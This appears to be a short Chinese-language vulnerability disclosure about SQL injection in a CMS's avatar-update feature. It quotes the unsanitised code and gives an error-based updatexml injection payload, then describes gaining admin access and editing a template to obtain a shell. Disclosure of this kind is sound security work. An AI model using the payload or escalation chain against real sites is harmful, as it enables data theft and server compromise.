### 简要描述:
某处过滤不严格导致sql注入
### 详细说明:
在用户修改个人头像的地方:
```
http://localhost:8081/index.php?s=member&c=info&a=avatar
```
没有对提交的参数进行过滤:
```
$data = $this->input->post('data', TRUE);
```
直接带入了sql查询:
```
$this->member->update(array('avatar'=> $data['avatar']), 'id=' . $this->memberinfo['id']);
```
于是造成注入,本人使用如下注入代码:
```
'or updatexml(1,concat(0x7e,(version())),0) #
```
在缩略图处输入注入代码:
[<img src="https://images.seebug.org/upload/201506/30082601cd49c1c6280729c54b860c32f6237618.png" alt="QQ截图20150630082535.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/30082601cd49c1c6280729c54b860c32f6237618.png)
提交后报错注入得到信息:
[<img src="https://images.seebug.org/upload/201506/3008262090b8d535a8b243b072c525f5531d5afd.png" alt="QQ截图20150630082459.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/3008262090b8d535a8b243b072c525f5531d5afd.png)
注入进入后台以后,修改模板:
[<img src="https://images.seebug.org/upload/201506/30082704e1ad22496b6960da38cba0b01f4b3c4f.png" alt="QQ截图20150630082635.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/30082704e1ad22496b6960da38cba0b01f4b3c4f.png)
可以getshell
[<img src="https://images.seebug.org/upload/201506/3008271532fce65ec33a9ab737ba8db771071ff6.png" alt="QQ截图20150630082642.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/3008271532fce65ec33a9ab737ba8db771071ff6.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201506/3008262090b8d535a8b243b072c525f5531d5afd.png" alt="QQ截图20150630082459.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/3008262090b8d535a8b243b072c525f5531d5afd.png)
京公网安备 11010502034610号
暂无评论